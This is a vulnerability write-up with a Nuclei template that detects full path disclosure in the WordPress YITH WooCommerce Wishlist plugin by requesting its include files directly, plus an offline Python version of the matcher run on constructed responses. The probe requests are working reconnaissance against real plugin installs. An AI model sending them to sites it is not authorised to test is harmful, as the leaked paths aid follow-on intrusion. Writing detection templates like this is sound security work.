Vulnerability description
The WordPress YITH WooCommerce Wishlist plugin is vulnerable to full path disclosure (FPD) via direct access to plugin files. Requesting one of the plugin's include files directly, outside the WordPress bootstrap, makes PHP abort with an uncaught error (the file calls WordPress functions or classes that are not loaded), and when display_errors is enabled the error message echoes the file's absolute path on disk, for example the web root under which WordPress is installed. The template below therefore matches only when the response is HTTP 200 and the body contains "Fatal error", "Uncaught Error:" and the plugin slug; a site with display_errors off, or a file that begins with the usual WordPress guard (if ( ! defined( 'ABSPATH' ) ) exit;), produces no match. The issue is informational (severity low): the leaked path is useful for follow-on attacks such as local file inclusion or log poisoning, but discloses nothing else by itself.
Nuclei template
id: wp-yith-woocommerce-wishlist-fpd

info:
  name: WordPress YITH WooCommerce Wishlist - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress YITH WooCommerce Wishlist plugin is vulnerable to full path disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/yith-woocommerce-wishlist/
  metadata:
    verified: true
    max-request: 3
    vendor: yithemes
    product: yith-woocommerce-wishlist
    framework: wordpress
    fofa-query: body="/wp-content/plugins/yith-woocommerce-wishlist/"
  tags: wp,wordpress,wp-plugin,fpd,yith,woocommerce,wishlist,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/includes/class-yith-wcwl.php"
      - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/includes/class-yith-wcwl-frontend.php"
      - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/includes/functions-yith-wcwl.php"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Fatal error"
          - "yith-woocommerce-wishlist"
          - "Uncaught Error:"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402203c6275460538cd6e0deb8ca2d73e8470c04c909b67eb57de9c4531433184a40c02205928ded34df7c1c7341bd3193a7140985997018d9c4a8a963dd9ef502d49d6fd:922c64590222798bb761d5b6d8e72950
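The matcher logic of the template, reimplemented as an added Python example so it can be run offline. This is not code from the template, from nuclei or from the plugin. It probes the same three paths in order, applies the same "all three words AND status 200" condition with stop-at-first-match semantics, and additionally pulls the disclosed absolute path out of the error message. The response bodies are constructed samples modelled on PHP's default html_errors output; the server path /var/www/html is a hypothetical value, not one observed on any site.

```python
import re
from typing import Dict, Optional, Tuple

# The three include files the template requests, relative to the WordPress root.
PROBE_PATHS = [
    "/wp-content/plugins/yith-woocommerce-wishlist/includes/class-yith-wcwl.php",
    "/wp-content/plugins/yith-woocommerce-wishlist/includes/class-yith-wcwl-frontend.php",
    "/wp-content/plugins/yith-woocommerce-wishlist/includes/functions-yith-wcwl.php",
]

# Word matcher with condition: and, as in the template.
REQUIRED_WORDS = ("Fatal error", "yith-woocommerce-wishlist", "Uncaught Error:")

# PHP 7+/8 uncaught-error message: "... in /abs/path/file.php:LINE" (or "on line N").
PATH_RE = re.compile(r" in (/[^\s:]+\.php)(?::\d+| on line \d+)")

# Constructed sample: what PHP prints when display_errors=On and html_errors=On
# and an include file is loaded outside the WordPress bootstrap. The path is hypothetical.
VULN_BODY = (
    "<br />\n<b>Fatal error</b>:  Uncaught Error: Call to undefined function add_action() in "
    "/var/www/html/wp-content/plugins/yith-woocommerce-wishlist/includes/class-yith-wcwl.php:45\n"
    "Stack trace:\n#0 {main}\n  thrown in <b>/var/www/html/wp-content/plugins/"
    "yith-woocommerce-wishlist/includes/class-yith-wcwl.php</b> on line <b>45</b><br />\n"
)

# Constructed response tables: probe path -> (status, body).
# First site: display_errors on, so the first probe already leaks the path.
SAMPLE_RESPONSES: Dict[str, Tuple[int, str]] = {
    PROBE_PATHS[0]: (200, VULN_BODY),
    PROBE_PATHS[1]: (200, VULN_BODY.replace("class-yith-wcwl.php", "class-yith-wcwl-frontend.php")),
    PROBE_PATHS[2]: (200, ""),
}
# Second site: every file starts with `if ( ! defined( 'ABSPATH' ) ) exit;`,
# so direct access returns an empty 200 page and nothing is disclosed.
HARDENED_RESPONSES: Dict[str, Tuple[int, str]] = {p: (200, "") for p in PROBE_PATHS}


def is_fpd_response(status: int, body: str) -> bool:
    """matchers-condition: and -> status matcher AND word matcher (all words present)."""
    return status == 200 and all(word in body for word in REQUIRED_WORDS)


def disclosed_path(body: str) -> Optional[str]:
    """Extract the absolute filesystem path echoed by the PHP error, if any."""
    match = PATH_RE.search(body)
    return match.group(1) if match else None


def scan(responses: Dict[str, Tuple[int, str]]) -> Optional[dict]:
    """Walk the probe list in order; return on the first hit (stop-at-first-match: true).

    `responses` stands in for the HTTP client: a missing entry is treated as a 404.
    """
    for path in PROBE_PATHS:
        status, body = responses.get(path, (404, ""))
        if is_fpd_response(status, body):
            return {"path": path, "disclosed": disclosed_path(body)}
    return None


if __name__ == "__main__":
    print("display_errors on :", scan(SAMPLE_RESPONSES))
    print("ABSPATH guard     :", scan(HARDENED_RESPONSES))
```

A body that carries "Fatal error" and "Uncaught Error:" from some other PHP file, but not the plugin slug, is deliberately not a hit: the slug check is what ties the disclosure to this plugin rather than to any broken script on the host. Note also that a PHP fatal error with display_errors off is normally served as an empty HTTP 500, which the status matcher rejects.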